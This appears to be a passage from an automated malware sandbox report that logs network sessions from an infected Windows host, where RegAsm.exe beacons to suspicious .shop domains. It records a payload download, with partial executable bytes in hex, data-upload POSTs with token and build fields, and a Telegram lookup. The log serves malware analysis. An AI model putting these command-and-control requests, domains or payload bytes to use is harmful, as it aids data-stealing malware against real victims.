72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 Data Ascii: m:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
2024-09-28 03:23:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49738	188.114.97.3	443	2740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:46 UTC	356	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=IWHnYuofSncPDEimx5tixRdwvfnYtaFEDFX2MKEytaA-1727493825-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: offensivedzvju.shop
2024-09-28 03:23:46 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=
2024-09-28 03:23:46 UTC	776	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s438tjmo4seaptic763bulkool; expires=Tue, 21 Jan 2025 21:10:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zXmy%2F9XcCdyFLaTipuU3dV80SKNrxzgWCpffXrvYddqhInN6wNi%2FXlIrAZsW3FvDnpeQbXT%2Fvp6OR%2FTnsoNAYuKtPtB4ZmqUZZ1rmtl4ReDbbMOqGjCRb%2BWCaMiJqvS1c3%2Brkk4b"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09dde894b43af-EWR
2024-09-28 03:23:46 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-28 03:23:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49739	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:46 UTC	97	OUT	GET /ldms/66f75fd9dc673_vasd.exe HTTP/1.1 Host: files.bloodqwe.shop Cache-Control: no-cache
2024-09-28 03:23:46 UTC	708	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:46 GMT Content-Type: application/octet-stream Content-Length: 5661736 Connection: close Last-Modified: Sat, 28 Sep 2024 01:46:01 GMT ETag: "66f75fd9-566428" X-Content-Type-Options: nosniff Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 5484 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jj%2FjhQnZ7QugscHRVSchPEGogahSorAwP2SwuQw2nmoyRZVodJTrQtnbco0Hj6EqY01KYu7qggUFS2Y4Eqbv9frEQ%2BzpohHrnaqDAOsUeiPDvTF2fY5xjQXbnrKIkB%2F4Ve50%2FwaF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09ddf781e41d8-EWR
2024-09-28 03:23:46 UTC	661	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 61 5d f7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 34 56 00 00 08 00 00 00 00 00 00 7e 52 56 00 00 20 00 00 00 60 56 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 56 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa]f4V~RV `V@ V`
2024-09-28 03:23:46 UTC	1369	IN	Data Raw: 22 89 69 9f d7 42 f6 c4 92 71 ac 70 13 5a 49 5a c9 24 f8 41 fd 5d c6 fc 6d ca 10 0a 72 13 89 9b 6f 24 87 f2 e2 82 9f 84 c1 93 51 49 0b 3b 4f fb 2b 33 40 36 46 4e 0a 57 b8 d0 67 3e c4 50 0f 65 b7 7d 05 96 e3 ac e3 e1 0c 19 08 58 b0 17 04 86 76 2d 2b ba 59 d5 5c c0 7a d9 a9 2f 61 be 36 7e 81 72 80 ed 07 92 cb 75 19 2b 12 29 80 b2 49 16 ec fb 37 7f b6 fe 8a af 06 44 57 cd f0 07 24 3b 08 ce ac 45 78 90 16 d8 c6 73 37 31 26 ae 21 96 eb ee a0 dd bc df 1b 74 5f d5 99 ea 5c 0f 39 fd d6 b7 c2 07 68 fc c2 4a 30 4f 61 2f c6 6c 01 74 e4 a5 5a 5b a9 aa 7a ba cb 51 ef 66 f0 0b 4d b7 03 15 5a c4 0c 4a 25 1a 8d 28 cb 72 25 26 97 35 1e cf 51 77 e4 8e 6b b9 81 58 ea aa 99 45 d5 0c df d9 d3 6b 2b 21 d6 06 9f 6b 5d 79 fb bc 26 ba ce 9f 75 c5 a1 8c 70 3c 6f bb 21 22 54 31 c8 Data Ascii: "iBqpZIZ$A]mro$QI;O+3@6FNWg>Pe}Xv-+Y\z/a6~ru+)I7DW$;Exs71&!t_\9hJ0Oa/ltZ[zQfMZJ%(r%&5QwkXEk+!k]y&up<o!"T1
2024-09-28 03:23:46 UTC	1369	IN	Data Raw: 08 b3 6a 62 9d 2f 72 be 31 85 99 6d 78 b2 59 67 3f a4 49 3f 8c 3e fe 29 95 40 44 72 64 0a 3e d8 93 b3 84 7e 90 80 db 45 7f f6 f4 9a b9 d2 0c 25 83 0a 4f 85 df e0 3b b4 ef fa 42 bf a1 e2 5d 9c 97 04 3c 9c 93 7f 25 87 a7 4b 9d 04 fc 5b dc c5 34 cb 08 6b 21 c3 3a 49 fb 9b 54 3f 67 6d 25 12 ed d3 f8 b9 c1 c7 e1 b5 96 c8 ef 77 3c 1e 08 21 01 99 9a d2 5f 71 ed f4 f1 e5 b0 13 70 4e eb ac 9e 65 12 cc 20 f8 e3 6d 64 02 38 b0 6b e6 38 76 26 ff d0 a2 5a cb de 93 74 16 b1 a4 dd 86 51 73 8c f1 8f 20 59 48 49 c9 5c e5 8e 41 44 60 34 ab 03 4b ce a0 14 7e 24 a2 84 e6 62 55 43 33 74 95 96 ee d1 37 15 70 19 86 fe b7 d4 77 e8 97 b5 51 6d 8b 1e 2a a0 71 30 51 c6 c8 99 0f 78 a2 50 6d 2c 36 eb 4c 50 6f e6 9b 6c ad f6 8a a8 74 bd 28 f1 ce 6f 2c 6e 64 d0 86 92 76 ab 9b dd 8d 9a Data Ascii: jb/r1mxYg?I?>)@Drd>~E%O;B]<%K[4k!:IT?gm%w<!_qpNe md8k8v&ZtQs YHI\AD`4K~$bUC3t7pwQm*q0QxPm,6LPolt(o,ndv
2024-09-28 03:23:46 UTC	1369	IN	Data Raw: 24 67 74 fb 32 f6 36 fd a3 a1 90 21 79 2b ff 34 26 a2 2c 9b bd 4e 00 24 a5 74 c6 fc 69 1c 36 e8 5f 5c bf 61 62 3c 12 1c fe f5 77 3a 04 7e 50 92 ca 13 bc 27 4b 5c 8a 19 93 83 e7 2d 76 49 9f 62 85 1c fe 2a 0d d0 b9 2e 9f e1 a1 7d 87 a0 ce 2c 76 49 e9 1a b7 e3 76 78 30 19 c1 33 9d 1b 68 42 b8 7e 94 81 36 8d 9e 76 5b e5 04 33 30 a9 f0 b0 52 f9 b5 c2 b1 9a 98 10 88 b1 2c a4 90 d9 8a 91 de 00 61 d0 ad c8 f4 45 27 f7 ef c9 08 f6 a2 18 1b 75 4f 50 cb 39 9b 3c 53 c1 7d af 65 d0 47 61 32 3b ea 43 3b b2 a7 df 98 99 53 0d 2b 11 0a 5e 46 3a 1c c8 54 50 6c e1 44 3d 2f dc ff 8b 38 40 55 7a 9b 28 e5 64 84 f7 a2 b8 8e 87 a2 8d de 9d fd 9d 57 3f a9 cc 10 c7 a2 52 db fc 0a 8a 31 3a dc df 68 bf 25 fa 78 e3 a1 0a 80 48 82 51 45 1b 6d e6 bb 16 64 61 12 2d 8d 12 b5 47 59 0a 2f Data Ascii: $gt26!y+4&,N$ti6_\ab<w:~P'K\-vIb*.},vIvx03hB~6v[30R,aE'uOP9<S}eGa2;C;S+^F:TPlD=/8@Uz(dW?R1:h%xHQEmda-GY/
2024-09-28 03:23:46 UTC	1369	IN	Data Raw: 8c 5d 49 67 a0 64 53 11 6d a9 f7 fe ab 3b 69 34 fe 0f 45 0e 9a c7 53 d9 e7 b6 59 6e 61 13 a0 45 a5 eb ca 74 1a a3 cd ca ba da 42 35 db 4b f0 9b 25 24 06 35 43 29 6e 91 54 94 9d 1b d8 9d 06 3e ba b6 06 ef d0 53 04 44 53 b1 3c d9 e8 ce 29 0e 58 63 81 73 3c e7 9d 4d fa 2b a2 35 8d 43 1d d0 39 14 19 b3 fd d9 fe 79 5e d2 f1 55 b0 08 a9 56 8d 54 4d e2 e8 e5 43 ed 73 e4 1d f8 6c 63 dc e3 2e cf 42 b3 6b 0d 64 8e aa f2 02 5a ef e2 46 ec 7e 50 1e 32 82 0d 8c e7 db 6f 7a 0e f9 2e b3 69 3c 9c 00 b1 73 85 6a 5e 03 22 d7 03 4a 3e a0 6e 8f ed 36 80 00 4d 3d dd 71 af 11 4f 57 32 ff 0d d4 4e 38 fe 50 4e 45 60 1a 27 f2 3f 09 be 0f cd 1f 34 4d 95 7d a5 14 27 3c cf 67 b5 2f d2 43 5c bb 73 91 b8 b2 0c b1 a7 8f b4 a3 0f 2d a1 f9 75 b6 b2 89 c9 29 c3 2f 6f 90 d7 bc fa 1f 96 97 Data Ascii: ]IgdSm;i4ESYnaEtB5K%$5C)nT>SDS<)Xcs<M+5C9y^UVTMCslc.BkdZF~P2oz.i<sj^"J>n6M=qOW2N8PNE`'?4M}'<g/C\s-u)/o
2024-09-28 03:23:46 UTC	1369	IN	Data Raw: 38 76 66 84 39 98 a4 e8 7c 89 39 9c 0a 52 98 6a 8a d3 f6 b8 3d 56 5c 8e 9b 38 65 80 d3 12 5c e2 e4 88 bb b0 8f 05 b1 23 ee 69 07 02 a1 22 59 9a 32 82 02 45 7d 77 2a db 57 be 4b ef 4e 6a f4 a9 0d 8e 2a 49 07 5a 37 ba 94 85 23 47 a9 35 7d 47 b4 49 74 27 88 5d 0d 2e 37 54 b9 d4 24 45 7c d4 94 07 94 33 3b 92 24 c5 f7 11 5b e7 6b 98 57 53 82 1c 2f ee ef 18 80 7d 41 d2 0a 07 ad 01 ad ec f8 79 ba 57 a1 95 d7 3c 18 60 da 63 36 25 d9 66 51 a9 d9 58 60 7d f7 50 57 49 64 51 11 91 4f bc 54 e7 be 8f 66 13 64 8b ff f5 b7 76 d4 63 2d 72 97 8f 2a fc cd 1d f5 71 19 b5 4c 17 2a 22 ae 53 02 9b 9e 9b 8a 35 d1 65 ed 36 36 1c 44 29 de ed 4b 36 60 06 f2 b5 77 33 a6 56 9d a7 ca 12 1d b5 4d 68 34 7f a0 c1 f3 23 f1 f9 4d 42 a9 4f 8a 66 09 4c 44 38 89 25 71 56 75 ab 04 3f 51 a2 5e Data Ascii: 8vf9\|9Rj=V\8e\#i"Y2E}wWKNjIZ7#G5}GIt'].7T$E\|3;$[kWS/}AyW<`c6%fQX`}PWIdQOTfdvc-rqL"S5e66D)K6`w3VMh4#MBOfLD8%qVu?Q^
2024-09-28 03:23:46 UTC	1369	IN	Data Raw: 16 af f6 61 61 63 73 05 11 1d c8 96 fe 9a fd de 3c bb da 70 d1 cf c2 a2 0b 0b 2d e3 06 a8 47 c2 c9 ea 11 da 7c 70 d7 43 52 a9 8d d4 d7 a3 eb e3 02 1b 65 38 5f f6 67 00 be f4 50 35 eb 9e f9 8c 47 1d c7 1b cf 68 83 04 9f b9 28 a6 1e c4 10 73 58 55 8c a5 2d 51 ce be c5 ba 37 09 f5 1e 34 9d e7 71 9e 3a 55 c1 3c 30 b8 74 27 c7 f7 78 09 cf 1c 03 f8 67 63 0b e7 eb f7 31 6e a9 bd 29 8e 2e b6 bf 37 68 18 20 a4 98 db ea bf 12 59 dd 7d a4 aa 41 6b 7e 39 3a 1f a4 7e ee f4 ce a0 22 1a f9 3d 76 87 6b 7d 3a 82 45 cd e1 84 da 89 fc 72 f0 df 9b 90 e2 6f 87 12 9e 74 82 8b 8e 16 78 4d 27 ad 06 4f a5 75 e3 1d 47 8c 23 cb 8b 9e 61 96 83 ac 1f 08 73 78 bb b3 dd 42 e4 3e c5 6a 14 2a f1 f8 18 e2 c3 71 a4 a2 c5 26 63 c5 7a aa 8c e2 92 bd 0f d4 26 93 36 8c 47 ba 97 4c 44 97 6b 91 Data Ascii: aacs<p-G\|pCRe8_gP5Gh(sXU-Q74q:U<0t'xgc1n).7h Y}Ak~9:~"=vk}:ErotxM'OuG#asxB>j*q&cz&6GLDk
2024-09-28 03:23:46 UTC	1369	IN	Data Raw: 6e 7b 0c c4 44 f2 0b 69 c6 c7 82 cf e7 4f e4 d5 73 90 b3 6e cb 38 f6 a9 93 b3 91 10 8c 8c 6e 9d 3c ed 6b 6f 09 2a 97 51 29 a7 29 49 bb b3 a5 54 36 a6 86 2f 7e 8a e1 3a 1b 59 3d 33 e1 bd 1c 40 4a e9 fe 88 c0 5a 1f d3 00 ae 14 cf 6a 5f 28 cd 52 93 13 3d 69 c4 43 ad cf 91 d4 f8 3d 0b 0c 51 7c 2b e7 88 60 08 96 9e 1c 40 fc 26 91 14 20 53 f4 8b 29 f2 72 ec 8b 3b 77 8a 86 00 c3 2c f5 de 87 8c fc 2c 79 a7 be c0 84 74 02 b4 02 9b f9 05 13 69 fb 7c 37 be 89 70 5b a2 06 ac cb ab a2 6c 3e 13 ea a6 5a 45 0d 55 06 ca 91 eb f8 18 70 df 58 85 3f e4 ba b4 5c 11 79 93 b3 4c 11 f6 a7 a7 74 d3 a3 ad 14 2c 47 73 93 a6 c5 b9 98 09 7d cf 42 bf 46 e8 d8 18 5d da 91 85 81 e8 20 a3 9b 36 45 90 41 b8 73 35 b3 4d 5a 56 19 dd 87 ab 7b bf 7c 29 ee 24 9e d9 57 8e a7 4b 01 b9 7e c2 2e Data Ascii: n{DiOsn8n<ko*Q))IT6/~:Y=3@JZj_(R=iC=Q\|+`@& S)r;w,,yti\|7p[l>ZEUpX?\yLt,Gs}BF] 6EAs5MZV{\|)$WK~.
2024-09-28 03:23:46 UTC	1369	IN	Data Raw: 19 7d be e4 19 09 5a a4 c4 1d a7 be 32 60 38 f9 21 93 19 d3 2c 1c 6e 83 de bb 70 44 9c 04 b7 c7 6a a7 43 e5 99 60 3d 99 09 9b da 7b 36 78 6e a3 ad 00 94 14 ce f0 92 cc ef a5 9f 09 47 d5 4e d4 29 27 7f 33 24 d0 d0 fd 6d 9a 57 4b 01 cf e9 48 4f 3b 46 82 9f ba 94 1f a0 a0 cf 6a 79 b9 d8 33 92 34 5b 08 09 8b f6 b3 fc 85 f8 9f f2 54 96 32 28 dc 0b 72 d1 b0 97 3e b4 12 d6 ad 3e 18 1b 1a d2 b6 34 2e 98 16 1c f6 ab ad ef b0 60 8c 14 24 c6 79 8e 1b cb ff 80 c6 bf 81 6e 9a e1 a2 dc 67 ed 2a 6d 45 41 78 a1 89 77 b3 93 46 65 53 99 08 b3 05 bd ed d3 a3 1d 4f aa f0 59 aa c2 a2 73 15 03 20 47 9e b7 cd 15 d2 0c 14 f7 0c 77 ef e2 be dc 09 8d 8b a1 d8 76 d0 b6 6c 60 de 3f b1 1e d7 1f a4 21 b9 26 a0 82 bc 97 7f f6 30 8e a3 09 d8 9d 31 50 4c 39 77 eb 66 23 30 58 6d f6 56 d0 Data Ascii: }Z2`8!,npDjC`={6xnGN)'3$mWKHO;Fjy34[T2(r>>4.`$yng*mEAxwFeSOYs Gwvl`?!&01PL9wf#0XmV
2024-09-28 03:23:46 UTC	1369	IN	Data Raw: 93 68 f3 af 74 3b 25 e5 b8 0f 0a 8e 25 09 07 09 fb 72 cb 4c 42 03 65 7b 56 17 26 4d ec 61 b1 2e 09 bd 13 79 be 76 12 11 b6 51 20 7c 7b 71 2a 98 91 e7 74 3d 98 76 f5 c5 be f4 3a b4 ca 47 29 7d a3 c8 81 30 63 d2 d5 99 46 eb bb 95 a3 b8 d7 94 42 2d ad fa 02 8d 01 65 b3 6f 92 15 f8 f0 e3 11 52 c8 48 5e e6 e7 c1 2f 7e 08 0e c8 7b f7 4e f0 9f 8a 67 4e ee 54 08 ed ff de b5 06 dd 6f 10 28 fb 49 e1 21 23 c6 9b 1e cb 2a 0e ff d9 e2 6f 3a 96 92 93 1c 63 b4 d0 e1 20 93 c4 9e c0 8a ba 10 03 ae ba 2e 6d dc 53 0b e0 96 bb 66 1b 28 9e fa ac 69 df 3b 1f e9 04 25 5f 18 41 08 f1 3a ce 0e 29 31 3d 64 1a 04 7f 99 df 2a c6 35 f6 6b 5a 58 21 66 e5 fb fb e9 c9 b0 d6 3a 4b 10 3e 17 55 6b 51 a5 6f 21 aa de f6 7b 57 e8 18 70 43 9e 35 48 ec b3 d1 7d 2f 7c d8 7e ff c6 bf a9 eb 70 34 Data Ascii: ht;%%rLBe{V&Ma.yvQ \|{qt=v:G)}0cFB-eoRH^/~{NgNTo(I!#o:c .mSf(i;%_A:)1=d*5kZX!f:K>UkQo!{WpC5H}/\|~p4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49742	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:52 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEG Host: bloodqwe.shop Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:52 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 Data Ascii: ------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------CBAKJKJJJECFIEBFHIEGCont
2024-09-28 03:23:53 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nCFttLRuwTve5D3FUTBHIk%2Bo5qjFyr9TLLcuE5XafAQqHJnVH7VEFgeUZ6h6x3wBlIxJkgmWbQ4uBOii%2BMcfYMaLZv5oOKa6VuG7m0Q1tc7VySCRVLee53vZK%2BVkS91K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09e03aa33c325-EWR
2024-09-28 03:23:53 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-09-28 03:23:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49744	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:53 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGC Host: bloodqwe.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:53 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------FHJKKECFIECAKECAFBGCCont
2024-09-28 03:23:54 UTC	572	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K1agt%2FkzH8gjGDX5QZK8irInBGm37tWkiXSF5aDxLP%2FjbLAZsAdvEEMwIMXCB6q9SqZsV%2F6hBT0Zl6ucC9mbFphZz3nml5%2FDgSy9uHyuGeX0nzosyYtKzaPdW5WZ%2B8WB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09e0e7f18c440-EWR alt-svc: h3=":443"; ma=86400
2024-09-28 03:23:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49747	149.154.167.99	443	2656	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:24:13 UTC	145	OUT	GET /jamsemlg HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache Cookie: stel_ssid=8a305275312b1df9cb_1894863477225248363
2024-09-28 03:24:13 UTC	369	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 28 Sep 2024 03:24:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12369 Connection: close Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-09-28 03:24:13 UTC	12369	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6a 61 6d 73 65 6d 6c 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @jamsemlg</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pare

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49748	172.67.167.90	443	2656	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:24:14 UTC	88	OUT	GET / HTTP/1.1 Host: bloodqwe.shop Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:24:14 UTC	575	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:24:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f13lk9XbiH9EAmWE7AS8tkFH30ElnyIYp1bgZLQXCdU63mcPbLU1dugNoQCQw6f1bhN3eGhYcPykpamxbCuBj9pymagWkYvXgvylvScFDxBsqLh3vHBIlBlnSDbPYHmv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8ca09e8cbf221895-EWR
2024-09-28 03:24:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49749	172.67.167.90	443	2656	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:24:15 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKEBFBAKKFCBGDHDGHD Host: bloodqwe.shop Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache
